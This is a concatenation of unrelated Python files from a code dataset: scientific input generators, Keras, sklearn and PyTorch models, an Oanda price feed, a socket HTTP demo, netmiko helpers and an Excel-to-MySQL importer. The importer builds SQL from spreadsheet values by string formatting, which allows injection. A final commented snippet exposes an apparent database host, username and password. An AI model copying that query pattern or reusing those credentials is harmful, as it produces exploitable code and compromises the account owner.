help\")\n\n def _create_structure_parameters(self):\n \"\"\"structure type dependent constants\"\"\"\n # ibz: symmetry flag\n # kpc: k-points along c axis (relevant for hcp and and dhcp)\n structure = self._structure\n kmesh = self._kmesh\n\n c_by_a = np.sqrt(8.0 / 3.0) # ideal c_by_a\n if structure == 'fcc':\n ibz = 2\n kp = int(round(kmesh ** (1.0 / 3.0)))\n kpc = kp\n elif structure == 'bcc':\n ibz = 3\n kp = int(round(kmesh ** (1.0 / 3.0)))\n kpc = kp\n elif structure == 'hcp':\n ibz = 4\n kp = int(round((kmesh * 0.5 * c_by_a) ** (1.0 / 3.0)))\n kpc = int(round(kp / c_by_a))\n elif structure == 'dhcp':\n ibz = 4\n kp = int(round((kmesh * 0.5 * c_by_a) ** (1.0 / 3.0)))\n kpc = int(round(kp / c_by_a * 0.5))\n else:\n raise ValueError('structure {} not known'.format(structure))\n self._ibz = ibz\n self._kp = kp\n self._kpc = kpc\n\n def _create_zmsh(self):\n temperature = self._temperature\n prec = 1e-12\n if abs(temperature) < prec:\n zmsh = 'E'\n elif temperature > prec:\n zmsh = 'F'\n else:\n raise ValueError('temperature must not be negative')\n self._zmsh = zmsh\n\n @staticmethod\n def check_inp_kgrn():\n # check whether the number of variables in inp_kgrn is equal to 11\n with open('inp_kgrn', 'r') as f:\n lines = f.read()\n if len(re.findall('\\?[^?]*\\?', lines)) != 11:\n raise ValueError('inp_kgrn template wrong')\n\n def _create_spin_type(self):\n \"\"\"spin type\"\"\"\n mag = self._mag\n if mag in ['NM']:\n spin_type = 'P'\n elif mag in ['FM', 'DLM']:\n spin_type = 'F'\n elif mag in ['AFM']:\n raise NotImplementedError('AFM not implemented yet')\n else:\n raise ValueError('spinType from parameters.dat not known')\n self._spin_type = spin_type\n\n def _create_iex(self):\n \"\"\"xc type\"\"\"\n xc = self._xc\n dictionary = {'PBE': 7, 'PW91': 9, 'LDA': 4}\n iex = dictionary[xc]\n self._iex = iex\n\n def _create_directory_name(self):\n xc = self._xc\n kmesh = self._kmesh\n structure = self._structure\n volume = self._volume\n temperature = self._temperature\n mag = self._mag\n directory_name = '{}/{}kp/{}/{}/{}K/{}Ang3'.format(\n xc, kmesh, structure, mag, temperature, volume,\n )\n self._directory_name = directory_name\n\n def _create_rws(self):\n # transform from volume (Ang^3/atom) to R_{WS} (Bohr)\n # 1.8897261254578281\n volume = self._volume\n ang2bohr = 1e-10 / physical_constants['Bohr radius'][0]\n rws = convert_volume_to_rws(volume) * ang2bohr\n self._rws = rws\n\n def create_inp_kgrn(self):\n \"\"\"fill inp_kgrn template with actual parameters\"\"\"\n shutil.copy2('inp_kgrn', 'inp_kgrn_tmp')\n self._assign_parameters()\n self._assign_elements()\n\n def _assign_parameters(self):\n filename = 'inp_kgrn_tmp'\n with open(filename, 'r') as f:\n str_inp = f.read()\n str_inp = str_inp.replace('?S?' , '{:>3s}'.format(self._spin_type))\n str_inp = str_inp.replace('?K?' , '{:>3d}'.format(self._kp))\n str_inp = str_inp.replace('?KC?' , '{:>3d}'.format(self._kpc))\n str_inp = str_inp.replace('?SIG?', '{:6.1f}'.format(self._temperature))\n str_inp = str_inp.replace('?Z?' , '{:>2s}'.format(self._zmsh))\n str_inp = str_inp.replace('?I?' , '{:>3d}'.format(self._ibz))\n str_inp = str_inp.replace('?XC?' , '{:>3d}'.format(self._iex))\n str_inp = str_inp.replace('?RM?' 
, '{:6.4f}'.format(self._rws))\n        with open(filename, 'w') as f:\n            f.write(str_inp)\n\n    def _assign_elements(self):\n        filename = 'inp_kgrn_tmp'\n        with open(filename, 'r') as f:\n            str_inp = f.read()\n        tmp = self._create_element_lines()\n        str_inp = re.sub('\\?EL\\?.*\\?M\\?\\n', tmp, str_inp)\n        with open(filename, 'w') as f:\n            f.write(str_inp)\n\n    def _create_element_lines(self):\n        scales_magmom = self._create_scales_magmom()\n        scale_c = 1.0 / len(scales_magmom)\n        sublattice_indices = self._create_sublattice_indices()\n\n        s = '{:<4s} {:3d} {:3d} {:3d}  1 {:8.6f} {:5.3f} {:5.3f} '\n        s += '0.0000 0.0000   N {:7.4f}\\n' # Magnetic structure\n\n        df = pd.read_csv(\n            'parameters.dat',\n            header=None,\n            comment='#',\n            delim_whitespace=True,\n        )\n        self._check_concentrations(df)\n\n        tmp = ''\n        for iatom, it in enumerate(sublattice_indices):\n            ncount = 0\n            for scale_m in scales_magmom:\n                for i, v in df.iterrows():\n                    ncount += 1\n                    element, concentration, a_scr, b_scr, magmom = v\n                    tmp += s.format(\n                        element, iatom + 1, it, ncount, concentration * scale_c,\n                        a_scr, b_scr, magmom * scale_m,\n                    )\n        return tmp\n\n    def _create_scales_magmom(self):\n        mag = self._mag\n        if mag == 'FM':\n            scales_magmom = [1]\n        elif mag == 'NM':\n            scales_magmom = [0]\n        elif mag == 'DLM':\n            scales_magmom = [1, -1]\n        else:\n            raise ValueError('unknown mag {}'.format(mag))\n        return scales_magmom\n\n    def _create_sublattice_indices(self):\n        \"\"\"This should be consistent with smx_input.\n        Particularly be careful for dhcp\"\"\"\n        structure = self._structure\n        if structure in ['bcc', 'fcc']:\n            sublattice_indices = [1]\n        elif structure in ['hcp']:\n            sublattice_indices = [1, 1]\n        elif structure in ['dhcp']:\n            sublattice_indices = [1, 2, 1, 2]\n        else:\n            raise ValueError('Unknown structure {}'.format(structure))\n        return sublattice_indices\n\n    @staticmethod\n    def _check_concentrations(df):\n        csum = sum(df[1])\n        if abs(csum - 1.0) > 1e-5:\n            msg = 'concentrations in CPA block do not add up to one'\n            raise ValueError(msg)\n\n    def arrange_files(self):\n        \"\"\"copy inp_kfcd, structure constants and shape function\"\"\"\n        structure = self._structure\n        d = self._directory_name\n        # create the input directory\n        os.makedirs(d)\n\n        path = '/u/bzg/Thermodynamics/utilities/EMTO/'\n        shutil.move('inp_kgrn_tmp', d + '/inp_kgrn')\n        shutil.copy2('inp_kfcd', d + '/inp_kfcd')\n        shutil.copy2(path + 'smx/{}.tfh'.format(structure), d + '/smx.tfh')\n        shutil.copy2(path + 'smx/{}.mdl'.format(structure), d + '/smx.mdl')\n        shutil.copy2(path + 'shp/{}.shp'.format(structure), d + '/shp')\n        shutil.copy2(path + 'ATOM.cfg', d)\n\n        os.mkdir(d + '/pot')\n        os.mkdir(d + '/chd')\n\n    def get_directory_name(self):\n        return self._directory_name\n\n\ndef convert_volume_to_rws(volume):\n    \"\"\"\n\n    volume: volume per atom\n    rws: Wigner-Seitz radius\n    \"\"\"\n    rws = (volume * 3.0 / (4.0 * np.pi)) ** (1.0 / 3.0)\n    return rws\n\n\ndef main():\n    import argparse\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        '-s', '--structures',\n        nargs='+',\n        choices=['bcc', 'fcc', 'hcp', 'dhcp'],\n        type=str,\n        help='Crystal structures',\n    )\n    parser.add_argument(\n        '--kmeshs',\n        nargs='+',\n        type=int,\n        help='Numbers of total k points per atom')\n    parser.add_argument(\n        '-m', '--mags',\n        nargs='+',\n        choices=['NM', 'FM', 'DLM', 'AFM'],\n        type=str,\n        help='Magnetic states',\n    )\n    parser.add_argument(\n        '--xcs',\n        nargs='+',\n        choices=['LDA', 'PBE', 'PW91'],\n        type=str,\n        help='XC functionals',\n    )\n    parser.add_argument(\n        '-v', '--volumes',\n        nargs='+',\n        type=float,\n        help='Volumes per atom 
(Å^3/atom)',\n )\n parser.add_argument(\n '-t', '--temperatures',\n nargs='+',\n type=float,\n help='Temperatures for electronic states (K)',\n )\n args = parser.parse_args()\n\n job_list = []\n import itertools\n for xc, kmesh, structure, mag, volume, temperature in itertools.product(\n args.xcs, args.kmeshs, args.structures, args.mags,\n args.volumes, args.temperatures,\n ):\n kgrn_creator = KGRNCreator(\n xc=xc, kmesh=kmesh, structure=structure, mag=mag,\n volume=volume, temperature=temperature\n )\n directory_name = kgrn_creator.get_directory_name()\n print(directory_name)\n if os.path.isdir(directory_name):\n print('Directory {} already exists'.format(directory_name))\n continue\n kgrn_creator.run()\n job_list.append(os.path.abspath(directory_name))\n\n with open('jobList', 'w') as f:\n f.write('\\n'.join(job_list) + '\\n')\n print('jobList file written')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"emtotools/kgrn_creator.py","file_name":"kgrn_creator.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"599890547","text":"from keras import Sequential\nfrom keras.applications import VGG16, ResNet50\nfrom keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout, UpSampling2D, ZeroPadding2D\nfrom keras.datasets import fashion_mnist\nfrom keras.utils import np_utils\n\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n\nX_train = x_train.reshape(x_train.shape[0], 28, 28,1)\nX_test = x_test.reshape(x_test.shape[0], 28, 28,1)\n\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n\nY_train = np_utils.to_categorical(y_train, 10)\nY_test = np_utils.to_categorical(y_test, 10)\n\n\nclassifier = Sequential()\nclassifier.add(Conv2D(64, kernel_size=(5, 5), strides=(1, 1),\n activation='relu',\n input_shape=(28,28,1),\n padding='same'))\nclassifier.add(Conv2D(64, kernel_size=(4, 4), strides=(1, 1),\n activation='relu',\n padding='same'))\nclassifier.add(Conv2D(64, kernel_size=(3, 3), strides=(1, 1),\n activation='relu',\n padding='same'))\nclassifier.add(Dropout(0.25))\nclassifier.add(Flatten())\nclassifier.add(Dense(10,activation='softmax'))\n\n\nclassifier.compile(optimizer='adadelta', loss='categorical_crossentropy', metrics=['accuracy'])\nprint(classifier.summary())\n\n# Training\nclassifier.fit(X_train, Y_train, epochs=10, batch_size=32)\n\n# Evaluation\nclassifier.evaluate(X_train, Y_train, batch_size=128)\nclassifier.evaluate(X_test, Y_test, batch_size=128)\n","sub_path":"Hw2/cnn_deep.py","file_name":"cnn_deep.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541972773","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.feature_selection import RFE\nfrom sklearn.svm import LinearSVC, SVC\n\n# NOTE: Make sure that the class is labeled 'class' in the data file\n#tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR')\n\nimport pickle \ndata = pickle.load(open('data/sent_dataset2.pkl','rb'))\n\nX = np.array(data['X'])\nY = np.array(data['Y'])\nri = range(X.shape[0])\nrl = range(X.shape[1])\n\nd = pd.DataFrame(X, index=ri, columns=rl)\n\nd['class'] = Y\n\nresult1 = d.copy()\n\ntraining_indices, testing_indices = train_test_split(d.index, stratify = d['class'].values, train_size=0.75, test_size=0.25)\n\n# Perform classification 
with a LinearSVC classifier\nlsvc1 = LinearSVC(C=0.01, penalty=\"l1\", dual=False, random_state=42)\nlsvc1.fit(result1.loc[training_indices].drop('class', axis=1).values, result1.loc[training_indices, 'class'].values)\n\nresult1['lsvc1-classification'] = lsvc1.predict(result1.drop('class', axis=1).values)\n\n# Use Scikit-learn's Recursive Feature Elimination (RFE) for feature selection\ntraining_features = result1.loc[training_indices].drop('class', axis=1)\ntraining_class_vals = result1.loc[training_indices, 'class'].values\n\nif len(training_features.columns.values) == 0:\n    result2 = result1.copy()\nelse:\n    selector = RFE(SVC(kernel='linear'), n_features_to_select=min(18, len(training_features.columns)), step=0.99)\n    selector.fit(training_features.values, training_class_vals)\n    mask = selector.get_support(True)\n    mask_cols = list(training_features.iloc[:, mask].columns) + ['class']\n    result2 = result1[mask_cols]\n","sub_path":"sentiment_pipeline.py","file_name":"sentiment_pipeline.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529017734","text":"\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nfrom torchvision.models.vgg import VGG\nimport torch.nn.functional as F\nfrom torch.nn import init\nimport numpy as np\nfrom .sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\nfrom .se_module import SELayer_2\n\nclass Conv2d(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size, stride=1, relu=True, padding=0,dilation=1, bn=False,Se=False):\n        super(Conv2d, self).__init__()\n        self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding=padding,dilation=dilation)\n        self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True) if bn else None\n        self.relu = nn.ReLU(inplace=True) if relu else None\n        self.se = SELayer_2(in_channels, out_channels, 16) if Se else None\n\n\n        # self.relu = nn.PReLU() if relu else None\n\n    def forward(self, x):\n        x = self.conv(x)\n        if self.bn is not None:\n            x = self.bn(x)\n        if self.relu is not None:\n            x = self.relu(x)\n        return x\n\nclass SeparableConv2d(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, bias=True):\n        super(SeparableConv2d, self).__init__()\n\n        kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)\n        pad_total = kernel_size_effective - 1\n        padding = pad_total // 2\n\n        self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding=padding, dilation=dilation,\n                                   groups=in_channels, bias=bias)\n        # extra BatchNormalization and ReLU\n        self.relu = nn.ReLU(inplace=True)\n        self.bn = nn.BatchNorm2d(in_channels)\n        self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)\n\n    def forward(self, x):\n        x = self.depthwise(x)\n        \n        x = self.bn(x)\n        x = self.relu(x)\n        x = self.pointwise(x)\n        return x\n\nclass SeparableAsppConv(nn.Module):\n    def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bn_momentum=0.1):\n        super(SeparableAsppConv, self).__init__()\n        self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size, stride=stride\\\n            , padding=padding, dilation=dilation,groups=in_channels,bias=False)\n        self.relu_dp = nn.ReLU(inplace=True)\n        # self.bn_dp = SynchronizedBatchNorm2d(in_channels, momentum=bn_momentum)\n        self.bn_dp = 
nn.BatchNorm2d(in_channels,momentum=bn_momentum)\n self.pointwise = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.relu = nn.ReLU(inplace=True)\n # self.bn = SynchronizedBatchNorm2d(in_channels, momentum=bn_momentum)\n self.bn = nn.BatchNorm2d(out_channels,momentum=bn_momentum)\n \n def forward(self,x):\n x = self.depthwise(x)\n # x = self.bn_dp(self.relu_dp(x))\n x = self.relu_dp(self.bn_dp(x))\n x = self.pointwise(x)\n # x = self.bn(self.relu(x))\n x = self.relu(self.bn(x))\n return x\ndef AsppConv(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bn_momentum=0.1):\n asppconv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, bias=False),\n # SynchronizedBatchNorm2d(out_channels, momentum=bn_momentum),\n nn.BatchNorm2d(out_channels,momentum=bn_momentum),\n nn.ReLU()\n )\n return asppconv","sub_path":"Model/Convolution.py","file_name":"Convolution.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111228737","text":"#!/usr/bin/env python\nimport pandas as pd\nimport numpy as np\nimport sys\nimport os\nimport mysql.connector\nfrom datetime import datetime\nimport pymysql\nimport re\nimport py_connection\n\n\nmycursor = py_connection.mydb.cursor()\ncount = 0\n# pd.set_option('display.max_columns', 20)\n# pd.set_option('display.width', 1000)\ntry:\n file_path = sys.argv[1]\n df = pd.read_excel(file_path)\nexcept:\n print('File not found')\n failed = pd.DataFrame({'Errors': ['File not found', sys.exc_info()[0]]})\n failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n print(count)\n sys.exit(1)\n\ntry:\n expected_headers = ['Sr. No.', 'Dept.', 'Initials', 'Name/s of Author /s / Faculty', 'Name of Course', 'Start Date', 'End Date', 'Organized By',\n 'Purpose', 'Target Audience', 'Faculty Role', 'Part time / Full time', 'No. of Participants', 'Duration', 'Local / National', 'Sponsor Details']\n file_headers = list(df.columns.values)\n print(expected_headers)\n print(file_headers)\n for i in range(len(expected_headers)):\n if(not expected_headers[i] == file_headers[i]):\n raise KeyError('Header format error in \"' +\n file_headers[i]+'\" Expected \"'+expected_headers[i]+'\"')\n df.dropna(axis=0, how='all', thresh=None, subset=None, inplace=True)\n# print(df.head())\n l = list(df.columns)\n# print(df.iloc[4:6,1])\n for i in l:\n if i[0:3] == '201' or i[0] == '1':\n name = i\n headers = df.iloc[0]\n # print(headers)\n df.columns = headers\n df = df.iloc[1:]\n # print(df.info())\n # print(df.head())\n # print(df.head())\n df = df[df.columns.dropna()]\n df.dropna(subset=[\"Name/s of Author /s / Faculty\"], axis=0, inplace=True)\n # print(df.head(1))\n # print(df.info())\n # print(df.shape[0])\n # df['Sr. 
No.'] = np.arange(len(df))\n    # print(df.isnull().head())\n    df.fillna('NA', inplace=True)\n    # print(df)\nexcept Exception as e:\n    print('Pre-processing error')\n    print(sys.exc_info())\n    failed = pd.DataFrame(\n        {'Errors': ['Pre-processing error', sys.exc_info()[0], e.args]})\n    print(failed)\n    print(count)\n    failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n    # failed.to_excel('failed_'+sys.argv[1]+'.xlsx',index=False)\n    sys.exit(1)\n\nfailed = pd.DataFrame(columns=df.columns)\nfailed['Errors'] = []\n\n# print(df)\n# enter every line into database\nfor i in range(0, df.shape[0]):\n    faclist = list(df.iloc[i, 2:])\n\n    try:\n        # pop initials\n        faclist.pop(0)\n\n        # separate coauthors\n        authors = faclist[0].split(',')\n        authname = authors[0].split('.')[-1].strip()\n        # print(\"author\"+authname)\n        q1 = \"SELECT Fac_ID from facultydetails where F_NAME like '%\"+authname+\"%'\"\n        mycursor.execute(q1)\n        result = mycursor.fetchone()\n        facid = \"\"\n        if result and len(result) == 1:\n            facid = int(result[0])\n        #print('Authname: '+str(authname)+'Facid:'+str(facid))\n        if facid == '':\n            raise Exception('Fac_ID not found/empty')\n        faclist.insert(0, facid)\n        # print(faclist)\n        # pop faculty name\n        faclist.pop(1)\n    except Exception as e:\n        failed = failed.append(df.iloc[i, :], ignore_index=True)\n        failed['Errors'].iloc[-1] = 'Author/ID formatting error\\n' + \\\n            str(e.args)\n        continue\n\n    try:\n        # start_date = faclist.pop(2)\n        # end_date = faclist.pop(2)\n        # if start_date != '' and start_date != 'NA':\n        #     date_from = datetime.strptime(start_date, '%d-%m-%Y')\n        #     start_date = datetime.strftime(date_from, '%Y-%m-%d')\n        # if end_date != '' and end_date != 'NA':\n        #     date_to = datetime.strptime(end_date, '%d-%m-%Y')\n        #     end_date = datetime.strftime(date_to, '%Y-%m-%d')\n        # # print(date_str)\n        # # faclist.pop(6)\n        # faclist.insert(2, start_date)\n        # faclist.insert(3, end_date)\n        start_date = str(faclist.pop(2))\n        end_date = str(faclist.pop(2))\n        if start_date != '' and start_date != 'NA':\n            date_from = datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n            #start_date = datetime.strftime(str(date_from), '%Y-%m-%d %H:%M:%S')\n            year = date_from.strftime(\"%Y\")\n            month = date_from.strftime(\"%m\")\n        if end_date != '' and end_date != 'NA':\n            date_to = datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')\n            delta = date_to - date_from\n            noofdays = delta.days\n            noofweeks = int(noofdays)//7\n\n        faclist.insert(2, str(date_from))\n        faclist.insert(3, str(end_date))\n    except Exception as e:\n        failed = failed.append(df.iloc[i, :], ignore_index=True)\n        failed['Errors'].iloc[-1] = 'Date formatting error\\n' + str(e.args)\n        continue\n\n    # deal with duration and participants null values\n    if faclist[10] == 'NA':\n        faclist[10] = 0\n    if faclist[11] == 'NA':\n        faclist[11] = 0\n\n    # dealing with sponsor details\n    try:\n        if faclist[-1] == 'NA':\n            faclist.append('not-sponsored')\n        else:\n            faclist.append('sponsored')\n    except Exception as e:\n        failed = failed.append(df.iloc[i, :], ignore_index=True)\n        failed['Errors'].iloc[-1] = 'Sponsor field formatting error\\n' + \\\n            str(e.args)\n        continue\n\n    # insert course type\n    faclist.insert(1,'online')\n\n    # print(faclist)\n    # mycursor.execute(\"INSERT INTO co_author(p_id,c_name) VALUES (2,'netra')\")\n    # print(mycursor.lastrowid)\n\n    # check if paper is already present\n    try:\n        c_name = '%'+faclist[2].strip().strip('\"').strip('.')+'%'\n        q_check = \"SELECT 1 from online_course_organised where Fac_id=\" + \\\n            str(faclist[0])+\" AND Course_Name LIKE '\"+c_name+\"'\"\n        # print(q_check)\n        
result = mycursor.execute(q_check)\n # print('afterrrr')\n result = mycursor.rowcount\n # print(\"RESULT\"+result,end='\\n\\n')\n if result == 0:\n val = tuple(faclist)\n # print(faclist)\n # print(val)\n sql = \"INSERT INTO online_course_organised(Fac_id, type_of_course, Course_Name, Date_From, Date_To, Organised_By, Purpose, Target_Audience, faculty_role, full_part_time, no_of_part, duration, status, name_of_sponsor, sponsored) VALUES (%s, '%s','%s','%s','%s','%s','%s','%s','%s','%s',%s,%s,'%s','%s','%s')\" % val\n # print(sql)\n\n mycursor.execute(sql)\n\n py_connection.mydb.commit()\n count = count+1\n print('E N T R Y P R O C E S S E D')\n else:\n # print(faclist)\n # print(authors)\n print('DUPLICATE ENTRY')\n except Exception as e:\n print('entry not processed'+str(e.args))\n # print(authors)\n # f_series = pd.Series(faclist, index = failed.columns)\n failed = failed.append(df.iloc[i, :], ignore_index=True)\n failed['Errors'].iloc[-1] = 'Entry not processed\\n' + str(e.args)\n continue\n\n\n# print(failed)\nprint(count)\n# status = os.stat('trial.xlsx')\n# print(oct(status.st_mode)[-3:])\n\n# df.to_excel(sys.argv[1], index=False)\nif not failed.empty:\n failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n# failed.to_excel('failed_'+sys.argv[1]+'.xlsx', index=False)\n","sub_path":"pandas_ocorganised.py","file_name":"pandas_ocorganised.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502195604","text":"from .base import AbstractBarPriceHandler\nfrom ..event import BarEvent\n\nimport requests\nfrom collections import deque\nimport six.moves.urllib as urllib\nfrom datetime import datetime, timedelta\n\noanda_request_date_format_string = '%Y-%m-%dT%H:%M:%SZ'\noanda_RFC3339_format = '%Y-%m-%dT%H:%M:%S.000000Z'\n\n\nclass OandaBarPriceHandler(AbstractBarPriceHandler):\n \"\"\"\n OandaBarPriceHandler..\n \"\"\"\n def __init__(self, instrument, granularity,\n start, end,\n daily_alignment=0, alignment_timezone=None,\n warmup_bar_count=0,\n server=None, bearer_token=None,\n events_queue=None):\n if len(instrument) == 6:\n self.instrument = instrument[:3] + \"_\" + instrument[3:]\n else:\n self.instrument = instrument\n self.granularity = granularity\n self.start_date = start\n self.end_date = end\n self.daily_alignment = daily_alignment\n self.alignment_timezone = alignment_timezone\n self.warmup_bar_count = warmup_bar_count\n # self.warmup_bar_counter = warmup_bar_count\n\n self.server = server\n self.bearer_token = \"Bearer %s\" % bearer_token\n self.request_headers = {\n 'Authorization': self.bearer_token,\n 'Connection': 'Keep-Alive',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-type': 'application/x-www-form-urlencoded'\n }\n\n self.events_queue = events_queue\n self.continue_backtest = True\n\n self.next_start_date = start\n self.candle_queue = deque()\n self.last_candle_time = ''\n self.candle_timespan = timedelta(\n seconds=self._granularity_to_seconds()\n )\n\n if warmup_bar_count > 0:\n # request warmup items (note: max 5000)\n\n start_string = self.start_date.strftime(\n oanda_request_date_format_string\n )\n\n url = (\n \"https://\" + self.server + \"/v1/candles\" +\n \"?instrument=\" + urllib.parse.quote_plus(self.instrument) +\n \"&granularity=\" + self.granularity +\n \"&count={}\".format(self.warmup_bar_count) +\n # grab bars up to the start date\n \"&end=\" + urllib.parse.quote_plus(start_string) +\n \"&candleFormat=midpoint\" +\n 
\"&dailyAlignment={}\".format(self.daily_alignment) +\n \"&alignmentTimezone=\" +\n urllib.parse.quote_plus(self.alignment_timezone)\n )\n response_json = requests.get(url, headers=self.request_headers)\n self.candle_queue.extend(response_json.json()['candles'])\n\n def _granularity_to_seconds(self):\n if self.granularity == 'D':\n return 86400 # Seconds in a day\n return None\n\n def _create_event(self, candle):\n return BarEvent(\n ticker=self.instrument,\n time=candle['time'],\n period=self._granularity_to_seconds(),\n open_price=candle['openMid'],\n high_price=candle['highMid'],\n low_price=candle['lowMid'],\n close_price=candle['closeMid'],\n volume=candle['volume']\n )\n\n def _pop_candle_onto_event_queue(self):\n if len(self.candle_queue) > 0:\n candle = self.candle_queue.popleft()\n bar_event = self._create_event(candle)\n self.events_queue.put(bar_event)\n else:\n self.events_queue.put(None)\n\n def _fetch_more_candles(self):\n\n start_string = self.next_start_date.strftime(\n oanda_request_date_format_string\n )\n\n url = (\n \"https://\" + self.server + \"/v1/candles\" +\n \"?instrument=\" + urllib.parse.quote_plus(self.instrument) +\n \"&granularity=\" + self.granularity +\n \"&count=5000\"\n \"&start=\" + urllib.parse.quote_plus(start_string) +\n \"&candleFormat=midpoint\"\n \"&dailyAlignment=\" + str(self.daily_alignment) +\n \"&alignmentTimezone=\" +\n urllib.parse.quote_plus(self.alignment_timezone)\n )\n\n response_json = requests.get(url, headers=self.request_headers)\n response_dict = response_json.json()\n\n # filter out incomplete and already queued candles\n candles = list(filter(\n lambda x:\n x['complete'] and\n x['time'] > self.last_candle_time and\n x['time'] < self.end_date.strftime(oanda_RFC3339_format),\n response_dict['candles']\n ))\n\n if len(candles) > 0:\n self.candle_queue.extend(candles)\n self.last_candle_time = candles[-1]['time']\n self.next_start_date = datetime.strptime(\n candles[-1]['time'],\n oanda_RFC3339_format\n ) + self.candle_timespan\n else:\n # self.events_queue.put(None)\n\n # either we have to wait for a new candle to become available (live\n # scenario) or we have to jump forward over a gap in candles (e.g.\n # a weekend, back test scenario)\n\n if self.next_start_date + self.candle_timespan > datetime.utcnow():\n return\n\n self.next_start_date += self.candle_timespan * 5000\n if self.next_start_date > self.end_date:\n self.continue_backtest = False\n\n def stream_next(self):\n \"\"\"\n Place the next BarEvent onto the event queue.\n \"\"\"\n if len(self.candle_queue) > 0:\n self._pop_candle_onto_event_queue()\n else:\n if (self.next_start_date > datetime.now() or\n self.next_start_date > self.end_date):\n self.continue_backtest = False\n return\n\n self._fetch_more_candles()\n self._pop_candle_onto_event_queue()\n","sub_path":"qstrader/price_handler/oanda.py","file_name":"oanda.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"464406858","text":"\"\"\"\nhttp请求过程演示\n\"\"\"\n\nfrom socket import *\n\n# tcp套接字 (http-->tcp)\ns = socket()\ns.bind(('0.0.0.0',8000))\ns.listen(3)\n\nc,addr = s.accept()\nprint(\"Connect from\",addr)\n# 获取请求\ndata = c.recv(4096)\nprint(data)\n\n# 返回响应\nresponse = \"\"\"HTTP/1.1 200 OK\nContent-Type:text/html\n\nHello 
World\n\"\"\"\n\nc.send(response.encode())\n\n\nc.close()\ns.close()","sub_path":"udp传输模型/http_test.py","file_name":"http_test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603995784","text":"#!/usr/bin/env python3\nfrom netmiko import ConnectHandler\n\n\"\"\"\n @author: Adrian González Pardo\n @date_update: 23/04/2021\n @github: AdrianPardo99\n\"\"\"\n\n\"\"\"\n @args:\n Es el diccionario que contiene los datos para la conexion\n Es la lista de comandos que va a ejecutar netmiko\n\"\"\"\ndef conectar(cisco,cmd):\n net_connect = ConnectHandler(**cisco)\n net_connect.enable()\n output=[]\n for i in range(len(cmd)):\n output.append(net_connect.send_command(cmd[i]))\n return output\n\n\"\"\"\n A diferencia de la función de arriba esta puede interconectarse con\n routers con routers y no equipo a router, en forma de puente la conexión\n @args:\n Es el diccionario que contiene los datos para la conexion\n Es la lista de comandos que va a ejecutar netmiko\n\"\"\"\ndef conectar_bridge(cisco,cmd):\n print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', cmd[0])\n net_connect = ConnectHandler(**cisco)\n print('Se hizo la conexión')\n net_connect.enable()\n print('Conexión hecha')\n output=[]\n for i in range(len(cmd)):\n print('Comando a anotar: ', cmd[i])\n output.append(net_connect.send_command_timing(cmd[i]))\n return output\n","sub_path":"ssh_connect.py","file_name":"ssh_connect.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"504620419","text":"# import difflib\n\n\n# a_dict = {\"id\": \"1\", \"name\": \"alexco\", \"address\": \"123 Main Street\", \"email\": \"afdaniels@alexco.com\"}\n# t_dict = {\"id\": \"1\", \"name\": \"alexco\", \"address\": \"123 Main Street\", \"email\": \"afdaniels@alexco.com\"}\n# counter = 0\n\n\n# for k,v in a_dict.items():\n \n# test = t_dict[k]\n\n\n# clean_i = ''.join(e for e in v if e.isalnum())\n# clean_t = ''.join(e for e in test if e.isalnum())\n# sequence = difflib.SequenceMatcher(isjunk=None, a=clean_t, b=clean_i)\n# difference = sequence.ratio()*100\n# difference = round(difference, 1)\n\n# print(clean_i, difference)\n\n# import pymssql\n\n# conn = pymssql.connect(server=\"mtsql17p.westus2.cloudapp.azure.com\", user=\"goldenron\", password=\"@RonPower!@#$!@#$\", 